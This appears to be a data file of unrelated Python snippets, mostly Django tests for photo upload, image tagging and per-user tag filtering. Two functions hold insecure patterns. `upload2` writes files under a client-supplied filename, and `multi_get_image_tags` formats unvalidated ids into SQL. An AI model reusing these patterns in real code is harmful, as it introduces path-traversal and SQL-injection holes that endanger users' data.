created_by=self.user)\n\t\tself.created_image.save()\n\t\tresponse = self.client.get('/api/modify_photo/?id={}'.format(self.created_image.id))\n\t\tself.assertEqual(response.status_code, status.HTTP_200_OK)\n\t\tself.assertEqual(response.data.get('name'), self.image_name)\n\t\tos.remove('static/media/' + str(self.created_image.image))\n\t\tdel self.created_image", "def test_tag_image_duplicate(self):\n\n message = {\n \"method\": \"build_image\",\n \"params\": {\"url\": self.url,\n \"tag_image\": self.tag_image}\n }\n response = yield self._get_response(message)\n\n self.assertIsInstance(response, dict)\n self.assertEqual(response[\"method\"], \"error\")", "def multi_tag_image(self, owner_userid, tag_userid, image_ids, tag_names):\n\t\ttry:\n\t\t\towner_userid = validation.cast_integer(owner_userid, 'owner_userid')\n\t\t\ttag_username = validation.cast_integer(tag_userid, 'userid')\n\t\texcept errors.ValidationError, ex:\n\t\t\treturn utils.return_deferred_error(ex.value)\n\n\t\tself.log.debug(\"about to tag %d images with %d tags\" % (len(image_ids), len(tag_names)))\n\t\tfor id in image_ids:\n\t\t\ttry:\n\t\t\t\tid = validation.cast_integer(id, 'image_id')\n\t\t\texcept errors.ValidationError, ex:\n\t\t\t\treturn utils.return_deferred_error(ex.value)\n\t\t\tself.log.debug(\"image %s\" % id)\n\n\t\t# do all inserts in a single transaction\n\t\tdef tag_txn(txn, owner, tagger, ids, tags):\n\t\t\tfor id in ids:\n\t\t\t\tid = validation.cast_integer(id, 'id')\n\t\t\t\tfor tag in tags:\n\t\t\t\t\ttag = tag.lower()\n\t\t\t\t\ttxn.execute(\"\"\"\n\t\t\t\t\t\tselect zoto_insert_user_image_tag(\n\t\t\t\t\t\t\t%s,\n\t\t\t\t\t\t\t%s,\n\t\t\t\t\t\t\t%s,\n\t\t\t\t\t\t\t%s\n\t\t\t\t\t\t)\n\t\t\t\t\t\"\"\", (owner, id, tag, tagger))\n\t\treturn self.app.db.runInteraction(tag_txn, owner_userid, tag_userid, image_ids, tag_names)", "def test_get_chef_with_photo(self):\n url = '/0/chefs/' + str(self.user.pk)\n headers = self.login()\n resp = self.client.get(url, **headers)\n self.assertEqual(resp.status_code, 200)\n self.assertIn('chef', resp.data)\n self.assertNotIn('photo', resp.data['chef'])\n\n self.user.avatar_photos.create(s3_url='image') # Create photo\n resp = self.client.get(url, **headers)\n self.assertEqual(resp.status_code, 
200)\n self.assertIn('chef', resp.data)\n self.assertIn('photo', resp.data['chef'])\n keys = set(('id', 'url', 'creation_date', 'edit_date'))\n self.assertEqual(keys, set(resp.data['chef']['photo']))", "def test_tags_limited_to_user_tags(self):\n\n user2 = create_user(\n fname='Test2',\n lname='User2',\n email='[email protected]',\n password='testpass2'\n )\n\n Tag.objects.create(user=user2, name='Vegan')\n tag = Tag.objects.create(user=self.user, name='Dessert')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def setUp(self):\n self.new_image = Images(image=\"image.jpg\", image_name=\"roses\", caption=\"live\",\n user_id=1, user='Joy', likes=0, posted_on=\"111-2019\")", "def test_equipment_by_id_image(self):\n pass", "def setUp(self):\n self.new_user = User(\n username=\"Hey\", email=\"[email protected]\", password=\"heyjfbghjdnf\")\n self.new_user.save()\n self.new_image = Image(name='Hey', user=self.new_user)\n self.new_image.save()", "def create_image(user_id, image_name, tag1, tag2, tag3):\n\n image = Image(user_id=user_id, image_name=image_name, tag1=tag1, tag2=tag2, tag3=tag3)\n\n db.session.add(image)\n db.session.commit()\n\n return image", "def testImageHandling(self):\n \n pm = getToolByName(self.portal, 'portal_membership')\n #make sure the person's member portrait isn't defined\n self.failUnless(pm.getPersonalPortrait('abc123').__name__ in ['defaultUser.gif', 'defaultUser.png'])\n \n # Delete the (nonexistant) image, make sure the portrait stays undefined\n self.person.setImage('DELETE_IMAGE')\n self.failUnless(pm.getPersonalPortrait('abc123').__name__ in ['defaultUser.gif', 'defaultUser.png'])\n \n self.person.setImage(TEST_GIF, content_type=\"image/gif\")\n #self.failUnlessEqual(self.person.getImage().data, TEST_GIF)\n # Try to get a 10x10 version of the image\n imageOfSizeTag = self.person.getImageOfSize(10, 10)\n self.failUnlessEqual(imageOfSizeTag, '<img src=\"http://nohost/plone/facstaffdirectory/abc123/image\" alt=\"Test Person\" title=\"Test Person\" height=\"10\" width=\"10\" />')\n self.failUnlessEqual(pm.getPersonalPortrait('abc123').__name__, 'abc123')\n \n # Try to get a scaled-by-ratio image with a width of 100.\n scaledImageTag = self.person.getScaledImageByWidth(100)\n self.failUnlessEqual(scaledImageTag, '<img src=\"http://nohost/plone/facstaffdirectory/abc123/image\" alt=\"Test Person\" title=\"Test Person\" height=\"150\" width=\"100\" />')\n \n # Delete the image, make sure the portrait is deleted as well\n self.person.setImage('DELETE_IMAGE')\n self.failUnless(pm.getPersonalPortrait('abc123').__name__ in ['defaultUser.gif', 'defaultUser.png'])\n \n #self.person.setImage(TEST_JPEG, content_type=\"image/jpeg\")\n #self.failUnlessEqual(self.person.getImage().data, TEST_JPEG)\n \n self.person.setImage(TEST_TIFF, content_type=\"image/tiff\")\n #self.failUnlessEqual(self.person.getImage().data, TEST_TIFF)\n # Try to get a 10x10 version of the image\n imageOfSizeTag = self.person.getImageOfSize(10, 10)\n self.failUnlessEqual(imageOfSizeTag, '<img src=\"http://nohost/plone/facstaffdirectory/abc123/image\" alt=\"Test Person\" title=\"Test Person\" height=\"10\" width=\"10\" />')\n \n # Try to get a scaled-by-ratio image with a width of 100.\n # TIFF handling in Plone is broken (probably the fault of PIL), handle the problem nicely.\n scaledImageTag = self.person.getScaledImageByWidth(100)\n self.failUnless(scaledImageTag == '<img 
src=\"http://nohost/plone/facstaffdirectory/abc123/image\" alt=\"Test Person\" title=\"Test Person\" height=\"150\" width=\"100\" />' or scaledImageTag == '')", "def test_photos_limited_to_user(self, api_client, test_user):\n\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n 'password123'\n )\n sample_photo(user=user2)\n sample_photo(user=test_user)\n\n api_client.force_authenticate(test_user)\n res = api_client.get(PHOTO_URL)\n\n photos = Photo.objects.filter(user=test_user)\n serializer = PhotoSerializer(photos, many=True)\n\n assert res.status_code == status.HTTP_200_OK\n assert len(res.data) == 1\n assert res.data == serializer.data", "def test_user_photo_retrieval_by_name_succeeds(self):\n\t\t# url = reverse('photodetail')\t\n\t\tself.created_image = UserPhoto(image=self.image, name=self.image_name, created_by=self.user)\n\t\tself.created_image.save()\n\t\tresponse = self.client.get('/api/image/?name={}'.format(self.created_image.name))\n\t\tself.assertEqual(response.status_code, status.HTTP_200_OK)\n\t\tself.assertEqual(response.data.get('name'), self.image_name)\n\t\t\n\t\tos.remove('static/media/' + str(self.created_image.image))\n\t\tdel self.created_image", "def test_create(self):\n data = {\n 'image': images.load_image()\n }\n photo = Photo.objects.create(**data)\n self.assertTrue(photo.pk)", "def setUp(self):\n\t\tself.username = fake.user_name()\n\t\tself.password = fake.password()\n\n\t\tself.image_name = 'test.png'\n\t\tself.img_url = 'static/img/test.png'\t\n\n\t\tself.user = User.objects.create_user(\n\t\t\tusername=self.username, password=self.password)\n\t\tself.user = authenticate(username=self.username, password=self.password)\n\t\tself.client.login(username=self.username, password=self.password)\n\n\t\tself.image = Image.frombytes('L', (100, 100), \"\\x00\" * 100 * 100)\n\t\tself.image = pil_to_django(self.image, 'png')\n\n\t\tself.created_image = UserPhoto(image=self.image, name=self.image_name, created_by=self.user).save()", "def test_recipe_nutrition_by_id_image(self):\n pass", "def test_statistics_view_set_photo_get_successful(self):\n # Create test users\n user = account_models.User.objects.create_superuser('[email protected]', 'pass')\n user.is_admin = True\n user.created_at = datetime(year=2016, month=12, day=31)\n user.save()\n\n user_1 = account_models.User.objects.create_user('[email protected]', 'test1', 'pass')\n user_1.created_at = datetime(year=2017, month=1, day=12)\n user_1.save()\n\n user_2 = account_models.User.objects.create_user('[email protected]', 'test2', 'pass')\n user_2.created_at = datetime(year=2017, month=1, day=15)\n user_2.save()\n\n user_3 = account_models.User.objects.create_user('[email protected]', 'test3', 'pass')\n user_3.created_at = datetime(year=2017, month=1, day=29)\n user_3.save()\n\n user_4 = account_models.User.objects.create_user('[email protected]', 'test4', 'pass')\n user_4.created_at = datetime(year=2017, month=1, day=31, hour=23, minute=59, second=59)\n user_4.save()\n\n user_5 = account_models.User.objects.create_user('[email protected]', 'test5', 'pass')\n user_5.created_at = datetime(year=2017, month=2, day=17)\n user_5.save()\n\n user_6 = account_models.User.objects.create_user('[email protected]', 'test6', 'pass')\n user_6.created_at = datetime(year=2017, month=2, day=21)\n user_6.save()\n\n user_7 = account_models.User.objects.create_user('[email protected]', 'test7', 'pass')\n user_7.created_at = datetime(year=2017, month=3, day=1, hour=0, minute=0, second=0)\n user_7.save()\n\n # Create 
test photos\n category_1 = photo_models.PhotoClassification.objects.get(name='Other')\n category_2 = photo_models.PhotoClassification.objects.get(name='Urban')\n\n photo_1 = photo_models.Photo.objects.create(image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_1.category.set([category_1])\n photo_1.created_at = datetime(year=2017, month=1, day=10)\n photo_1.save()\n\n photo_2 = photo_models.Photo.objects.create(\n user=user_1, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_2.category.set([category_1])\n photo_2.created_at = datetime(year=2017, month=1, day=12)\n photo_2.save()\n\n photo_3 = photo_models.Photo.objects.create(\n user=user_2, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_3.category.set([category_2])\n photo_3.created_at = datetime(year=2017, month=1, day=16)\n photo_3.save()\n\n photo_4 = photo_models.Photo.objects.create(\n user=user_3, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_4.category.set([category_1])\n photo_4.created_at = datetime(year=2017, month=1, day=31)\n photo_4.save()\n\n photo_5 = photo_models.Photo.objects.create(\n user=user_4, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_5.category.set([category_1])\n photo_5.created_at = datetime(year=2017, month=2, day=2)\n photo_5.save()\n\n photo_6 = photo_models.Photo.objects.create(\n user=user_5, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_6.category.set([category_1])\n photo_6.created_at = datetime(year=2017, month=2, day=18)\n photo_6.save()\n\n photo_7 = photo_models.Photo.objects.create(\n user=user_6, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_7.category.set([category_1])\n photo_7.created_at = datetime(year=2017, month=2, day=23)\n photo_7.save()\n\n photo_8 = photo_models.Photo.objects.create(\n user=user_7, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_8.category.set([category_2])\n photo_8.created_at = datetime(year=2017, month=3, day=1)\n photo_8.save()\n\n photo_9 = photo_models.Photo.objects.create(\n user=user_7, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_9.category.set([category_2])\n photo_9.created_at = datetime(year=2017, month=3, day=2)\n photo_9.save()\n\n client = APIClient()\n client.force_authenticate(user)\n\n request = client.get('/api/statistics/photos')\n results = request.data['results']\n\n self.assertEquals(len(results), 4) # 3 months of data\n self.assertEquals(results[0]['date'], '2016-12-1')\n self.assertEquals(results[0]['average_photos_per_user'], 0)\n self.assertEquals(results[1]['date'], '2017-1-1')\n self.assertEquals(results[1]['average_photos_per_user'], 0.80)\n self.assertEquals(results[2]['date'], '2017-2-1')\n self.assertEquals(results[2]['average_photos_per_user'], 1.0)\n self.assertEquals(results[3]['date'], '2017-3-1')\n self.assertEquals(results[3]['average_photos_per_user'], 1.12)", "def setUp(self):\n account_models.User.objects.create_user(email='[email protected]', password='WhoAmI', username='aov1')\n photo_models.PhotoClassification.objects.create_or_update(name='City',\n category_image=Photo(\n open('apps/common/test/data/photos/small.jpg',\n 'rb')),\n icon=Photo(\n open('apps/common/test/data/photos/small.jpg',\n 'rb')))\n abstract = photo_models.PhotoClassification.objects.create_or_update(name='Abstract')\n photo_models.PhotoClassification.objects.create_or_update(name='Rural', 
classification_type='category')\n photo_feed = photo_models.PhotoFeed.objects.create_or_update(name='Abstract')\n abstract.photo_feed = photo_feed\n abstract.save()", "def test_get_photos(self):\n recipe = Recipes.objects.create(chef=self.user, draft=False, private=False)\n photo = Photos.objects.create(recipe=recipe, photo_order=1)\n\n url = '/0/chefs/%i/photos' % self.user.pk\n\n resp = self.client.get(url)\n self.assertPermissionDenied(resp)\n\n headers = self.login()\n resp = self.client.get(url, **headers)\n self.assertEqual(resp.status_code, 200)\n self.assertIn('photos', resp.data)\n self.assertEqual(1, len(resp.data['photos']))\n keys = ('edit_date', 'creation_date', 'id', u'temperature', 'url', 'recipe', 'cover',\n 'time', 'instructions', 'order', 'quantity')\n self.assertEqual(set(keys), set(resp.data['photos'][0].keys()))", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n '123456'\n )\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def tag_image(self, owner_userid, tag_userid, image_id, tag_name):\n\t\ttry:\n\t\t\towner_userid = validation.cast_integer(owner_userid, 'owner_userid')\n\t\t\ttag_userid = validation.cast_integer(tag_userid, 'userid')\n\t\t\timage_id = validation.cast_integer(image_id, 'image_id')\n\t\t\tvalidation.required(tag_name, 'tag_name')\n\t\texcept errors.ValidationError, ex:\n\t\t\treturn utils.return_deferred_error(ex.value)\n\t\ttag_name = tag_name.strip()\n\t\t@stack\n\t\tdef tag_txn(txn, owner, tagger, image, tag):\n\t\t\ttag = tag.lower()\n\t\t\ttxn.execute(\"\"\"\n\t\t\t\tselect zoto_insert_user_image_tag(%s, %s, %s, %s)\n\t\t\t\"\"\", (owner, image, tag, tagger))\n\n\t\treturn self.app.db.runInteraction(tag_txn, owner_userid, tag_userid, image_id, tag_name)", "def test_profile_image_requested_field(self):\n source_comments = [self.create_source_comment()]\n self.register_get_thread_response({\n \"id\": self.thread_id,\n \"course_id\": str(self.course.id),\n \"thread_type\": \"discussion\",\n \"children\": source_comments,\n \"resp_total\": 100,\n })\n self.register_get_user_response(self.user, upvoted_ids=[\"test_comment\"])\n self.create_profile_image(self.user, get_profile_image_storage())\n\n response = self.client.get(self.url, {\"thread_id\": self.thread_id, \"requested_fields\": \"profile_image\"})\n assert response.status_code == 200\n response_comments = json.loads(response.content.decode('utf-8'))['results']\n for response_comment in response_comments:\n expected_profile_data = self.get_expected_user_profile(response_comment['author'])\n response_users = response_comment['users']\n assert expected_profile_data == response_users[response_comment['author']]", "def test_save_image(self):\n self.roses.save_image()\n image = Images.objects.all()\n self.assertEqual(len(image), 1)", "def model_processing(img):\n\n # assert isinstance(img, EmotionalImage)\n\n if str(img.name).find('json') > -1:\n return\n user = get_user(img.path + '/' + 'meta.json')\n filePath = img.path + '/' + img.name\n # print(\"---------------Processsing----------------\", img.name)\n\n features = extract_features(filePath)\n emotions = predict_emotions(features)\n uuid1 = uuid.uuid4()\n emImage = EmotionalImage(\n uuid1, img.name, img.path, features, emotions, \"\", \"\", 
\"\")\n user.images.append(emImage)\n # user.save()", "def test_tags_limited_to_user(self):\n imposter = get_user_model().objects.create_user(\n email='[email protected]', password='im_an_imposter')\n Tag.objects.create(user=imposter, name='BAD_FOOD')\n tag = Tag.objects.create(user=self.user, name='fruit')\n res = self.client.get(TAG_URL)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def test_tags_limited_to_user(self):\n user2 = create_user('[email protected]', 'OtherPassword')\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Home Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def upload2(request):\n uploaded = request.read\n fileSize = int(uploaded.im_self.META[\"CONTENT_LENGTH\"])\n fileName = uploaded.im_self.META[\"HTTP_X_FILE_NAME\"] \n fileContent = uploaded(fileSize)\n \n \"\"\"Write image to disk.\"\"\"\n fn, ext = os.path.splitext(fileName)\n name = fn + timezone.now().strftime(\"%Y_%m_%d_%H_%M_%S_%f\") + base64.urlsafe_b64encode(os.urandom(settings.SALT_LENGHT)) + ext\n fileHandler = open(settings.MEDIA_ROOT + \"images/\" + name, \"wb\")\n fileHandler.write(fileContent)\n fileHandler.close()\n \n \"\"\"Create md5hash digest for image.\"\"\"\n base64string = base64.b64encode(fileContent)\n mdfive = md5.new(base64string).hexdigest()\n \n \"\"\"Write image data to db.\"\"\"\n latitude = request.GET.get('lat')\n longitude = request.GET.get('lon')\n tags = request.GET.get('tags').split(' ')\n\n image = Image(title = name, md5hash = mdfive, pub_date = timezone.now(), lat = latitude, lon = longitude)\n image.save()\n\n for tagtext in tags:\n if Tag.objects.filter(name=tagtext).exists():\n t = Tag.objects.get(name=tagtext)\n else:\n t = Tag(name = tagtext)\n t.save()\n image.tags.add(t)\n image.save()\n\n return HttpResponse('{\"success\": true}')", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n 'testpass'\n )\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def test_api_thumbnail_retrieve_by_random_user(self):\n user = UserFactory()\n\n self.assert_user_cannot_retrieve_thumbnail(user, self.some_thumbnail)", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n 'Other User', '[email protected]', 'otherpassword')\n Tag.objects.create(user=user2, name='Nonveg')\n tag = Tag.objects.create(user=self.user, name='Fruity')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def test_m2m_dependent_object_import(self):\n user_profile: UserProfile = self.user_profiles[0] # See self.setUp()\n\n # ************ First Handle generating the Tags/Images Synthetically Through the Importer ************\n # Initialize Importers\n image_manager = ImporterManager(importer=ImageImporter())\n tag_manager = ImporterManager(importer=TagImporter())\n up_manager = ImporterManager(importer=UserProfileImporter())\n company_manger = 
ImporterManager(importer=CompanyImporter())\n user_manager = ImporterManager(importer=UserImporter())\n\n # Populate leaf models of dependency tree with kv data\n for row,image in enumerate(self.images):\n user_manager.update_kvs(field_name='username', value=user_profile.user.username, row=row)\n company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row)\n\n #: Retrieve data associated with kv data\n user_manager.get_available_rows()\n company_manger.get_available_rows()\n\n #: Populate data up the dependency tree with retrieved rows\n for row,image in enumerate(self.images):\n up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row)\n\n #: Retrieve data associated with models depended upon\n up_manager.get_available_rows()\n\n tag_manager.update_kvs('slug', 'blue', row=0, col=0)\n tag_manager.update_kvs('slug', 'green', row=0, col=1)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=0)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=0)\n\n tag_manager.update_kvs('slug', 'yellow', row=1, col=0)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(1), row=1, col=0)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(1), row=1, col=0)\n\n #: Retrieve associate intermediate data\n tag_manager.get_available_rows()\n\n for row,image in enumerate(self.images):\n image_manager.update_kvs('path', image.path, row=row)\n image_manager.update_kvs('name', image.name, row=row)\n image_manager.update_kvs('tag', tag_manager.get_object_or_list(row), row=row)\n image_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n\n image_manager.get_available_rows()\n\n self.assertNotEqual(image_manager.get_object_or_list(0), [])\n self.assertIsInstance(image_manager.get_object_or_list(0), Image)\n\n self.assertNotEqual(image_manager.get_object_or_list(1), [])\n self.assertIsInstance(image_manager.get_object_or_list(1), Image)", "def test_edit_image_instance(self):\n self.client.force_authenticate(self.user1)\n data = {\n \"img_name\": \"photo_user1\",\n \"img_description\": \"photo of user1\",\n \"favourite\": True,\n \"width\": 700,\n \"height\": 500,\n \"share_user\": [],\n }\n url = reverse(self.url_name_one, args=(1,))\n response = self.client.put(url, data, format=\"multipart\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n # Get edited object, convert to dict and compare with inputs\n obj = model_to_dict(Images.objects.get(id=1))\n for field, edited_data in data.items():\n self.assertEqual(edited_data, obj[field])\n # Check if image was edited to a new input\n edited_img = Image.open(self.test_pic_folder + \"/test.png\")\n self.assertEqual(edited_img.size, (700, 500))", "def test_save_image(self):\n self.new_image.save_image()\n self.assertTrue(len(Image.objects.all()) > 0)", "def multi_get_image_tags(self, owner_userid, image_ids, tag_type='owner'):\n\t\tif owner_userid:\n\t\t\towner_userid = validation.cast_integer(owner_userid, 'owner_userid')\n\t\tfor id in image_ids:\n\t\t\tid = validation.cast_integer(id, 'image_id')\n\t\tif tag_type == 'owner':\n\t\t\tinclude_clause = \"AND tag_userid = t2.owner_userid\"\n\t\telif tag_type == 'public':\n\t\t\tinclude_clause = \"AND tag_userid != t2.owner_userid\"\n\t\telif tag_type == 'all':\n\t\t\tinclude_clause = \"\"\n\t\t\t\n\t\timage_list = []\n\t\tfor id in 
image_ids:\n\t\t\timage_list.append(\"%s\" % id)\n\n\t\towner_clause = \"\"\n\t\tif owner_userid:\n\t\t\towner_clause = \"AND t2.owner_userid = %(owner_userid)s\"\n\t\tquery_args = {'owner_userid': owner_userid}\n\t\t\t\n\t\treturn self.app.db.query(\"\"\"\n\t\t\t\tSELECT\n\t\t\t\t\ttag_name,\n\t\t\t\t\tcount(*) AS cnt_images\n\t\t\t\tFROM\n\t\t\t\t\tuser_image_tags t1\n\t\t\t\t\tJOIN user_images t2 USING (image_id)\n\t\t\t\tWHERE\n\t\t\t\t\tt1.image_id in (%s)\n\t\t\t\t\t%s\n\t\t\t\t\t%s\n\t\t\t\tGROUP BY\n\t\t\t\t\ttag_name\n\t\t\t\tORDER BY\n\t\t\t\t\ttag_name asc\n\t\t\t\t\"\"\" % (','.join(image_list), owner_clause, include_clause), query_args)", "def test_tags_limited_to_user(self):\n\n user2 = get_user_model().objects.create_user(\n email='[email protected]',\n password='23pass1234&'\n )\n\n Tag.objects.create(user=self.user, name='Vegan')\n Tag.objects.create(user=self.user, name='Dessert')\n Tag.objects.create(user=user2, name='Valami mas')\n\n res = self.client.get(TAGS_URL)\n\n tags = Tag.objects.filter(user=self.user).order_by('-name')\n serializer = TagSerializer(tags, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), len(tags))\n self.assertEqual(res.data, serializer.data)", "def test_create_image(self):\n pass", "def test_getImages(self): # GIVEN the group chat has at least one image\n testBot = bot.Bot(os.environ['bot_id'], os.environ['token'], os.environ['group_ID'])\n imageList = testBot.run() #AND THEN post_images calls the private get_images method which returns an array\n self.assertTrue(len(imageList) > 0) #THEN there should be at least one element in the array", "def test_profile_image_requested_field(self):\n self.register_get_user_response(self.user)\n cs_thread = make_minimal_cs_thread({\n \"id\": self.thread_id,\n \"course_id\": str(self.course.id),\n \"username\": self.user.username,\n \"user_id\": str(self.user.id),\n })\n self.register_get_thread_response(cs_thread)\n self.create_profile_image(self.user, get_profile_image_storage())\n response = self.client.get(self.url, {\"requested_fields\": \"profile_image\"})\n assert response.status_code == 200\n expected_profile_data = self.get_expected_user_profile(self.user.username)\n response_users = json.loads(response.content.decode('utf-8'))['users']\n assert expected_profile_data == response_users[self.user.username]", "def test_user_photo_creation_succeeds(self):\n\t\timage_name = 'test1.png'\n\t\twith open(self.img_url, 'rb') as image:\t\t\t\n\t\t\tdata = {'image': image, 'name':image_name}\t\t\t\n\t\t\tresponse = self.client.post(reverse('photos'), data)\n\t\t\timage.close()\n\t\tself.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\t\tself.assertEqual(response.data.get('name'), image_name)", "def sample_photo(user, title='Lovely Photo'):\n return Photo.objects.create(user=user, title=title)", "def test_profile_image_requested_field(self):\n self.register_get_user_response(self.user)\n cs_comment_child = self.make_comment_data('test_child_comment', self.comment_id, children=[])\n cs_comment = self.make_comment_data(self.comment_id, None, [cs_comment_child])\n cs_thread = make_minimal_cs_thread({\n 'id': self.thread_id,\n 'course_id': str(self.course.id),\n 'children': [cs_comment],\n })\n self.register_get_thread_response(cs_thread)\n self.register_get_comment_response(cs_comment)\n self.create_profile_image(self.user, get_profile_image_storage())\n\n response = self.client.get(self.url, {'requested_fields': 'profile_image'})\n assert 
response.status_code == 200\n response_comments = json.loads(response.content.decode('utf-8'))['results']\n\n for response_comment in response_comments:\n expected_profile_data = self.get_expected_user_profile(response_comment['author'])\n response_users = response_comment['users']\n assert expected_profile_data == response_users[response_comment['author']]", "def test_photo_classification_view_set_get_filtered_successful(self):\n # Test data\n user = account_models.User.objects.get(email='[email protected]')\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n request = client.get('/api/photo_classifications?classification=tag')\n results = request.data['results']\n\n self.assertEquals(len(results), 2)", "def test_get_image_id(self):\n self.roses.save_image()\n image_id=Images.get_image_id(self.roses.id)\n self.assertTrue(image_id.id==self.roses.id)", "def test_tags_limited_to_user(self):\n user2 = User.objects.create(\n email='[email protected]',\n password='test_password'\n )\n Tag.objects.create(user=user2, name='Fruity')\n Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n tags = Tag.objects.filter(user=self.user).order_by('-name')\n serializer = TagSerializer(tags, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data, serializer.data)", "def test_add_tagitem(self):\n record = self.good_record()\n record['tag'] = self.tag\n # Create a fake record in mongo\n id = self.images.insert(record)\n\n status = self.m.add_tag(id, self.system, 'testtag')\n self.assertTrue(status)\n rec = self.images.find_one({'_id': id})\n self.assertIsNotNone(rec)\n self.assertIn(self.tag, rec['tag'])\n self.assertIn('testtag', rec['tag'])", "def test_image_uploads_on_save(self):\n \n files_count = len(os.listdir(settings.MEDIA_ROOT + '/persons'))\n with open('media/test_images/test.jpg') as f:\n self.client.post(reverse('edit'), {'ava': f})\n files_count_after = len(os.listdir(settings.MEDIA_ROOT + '/persons'))\n # added file and thumbnail\n self.assertEquals(files_count_after - files_count, 2) \n \n # test image scales \n from PIL import Image\n im = Image.open(settings.MEDIA_ROOT + '/persons/test.thumbnail.jpg')\n thumbnail_size = Person.thumbnail_size\n self.assertEquals((thumbnail_size,thumbnail_size), im.size)", "def test_upload_image(self):\n with open('apps/upload/tests/media/test.jpg') as f:\n r = post(self.client, 'upload.up_image_async', {'image': f},\n args=['questions.Question', 1])\n\n eq_(200, r.status_code)\n json_r = json.loads(r.content)\n eq_('success', json_r['status'])\n file = json_r['file']\n eq_('test.jpg', file['name'])\n eq_(90, file['width'])\n eq_(120, file['height'])\n name = '098f6b.jpg'\n message = 'Url \"%s\" does not contain \"%s\"' % (file['url'], name)\n assert (name in file['url']), message\n\n eq_(1, ImageAttachment.objects.count())\n image = ImageAttachment.objects.all()[0]\n eq_('pcraciunoiu', image.creator.username)\n eq_(150, image.file.width)\n eq_(200, image.file.height)\n eq_('question', image.content_type.model)\n eq_(1, image.object_id)", "def test_photo_classification_view_set_post_update(self):\n # Test data\n user = account_models.User.objects.get(email='[email protected]')\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n 
client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n payload = {\n 'name': 'Night',\n 'classification_type': 'tag'\n }\n\n request = client.post('/api/photo_classifications', data=payload, format='json')\n result = request.data\n\n self.assertEquals(result['name'], 'Night')\n\n # Query for entry as well\n classifications = photo_models.PhotoClassification.objects.all()\n\n self.assertEquals(len(classifications), 12)\n self.assertEquals(classifications[11].name, 'Night')", "def test_upload_image(self):\n image = self.mock_master.get_imagelist(self.region1)[0]\n id = self.mock_master.upload_image(self.region2, image)\n found = False\n for i in self.mock_master.get_imagelist(self.region2):\n if i.id == id:\n self.assertEquals(i.region, self.region2.region)\n self.assertEquals(i.name, image.name)\n self.assertEquals(i.checksum, image.checksum)\n found = True\n break\n self.assertTrue(found)", "def test_signup_photo(self, mocked_sendy):\n url = '/0/chefs'\n data = {\n 'email': '[email protected]',\n 'password': 'secret',\n 'name': 'John',\n 'surname': 'Doe',\n 'language': 'es',\n 'photo': IMAGES['png'],\n }\n resp = self.client.post(url, data=data)\n self.assertEqual(resp.status_code, 200)\n self.assertIn('auth', resp.data)\n self.assertIn('token', resp.data['auth'])\n # Check that the photo exists\n self.assertTrue(Chefs.objects.last().avatar_photos.all())", "def addImageSuggestion(self, item, metadata):\n claims = item.get().get('claims')\n\n if not metadata.get(u'imageurl'):\n # Nothing to add\n return\n if u'P4765' in claims:\n # Already has a suggestion\n return\n\n if u'P18' in claims:\n newimage = requests.get(metadata.get(u'imageurl'), stream=True)\n if not newimage.headers.get('Content-length'):\n return\n if not newimage.headers.get('Content-length').isnumeric():\n return\n newimagesize = int(newimage.headers['Content-length'])\n #print (u'Size of the new image is %s according to the 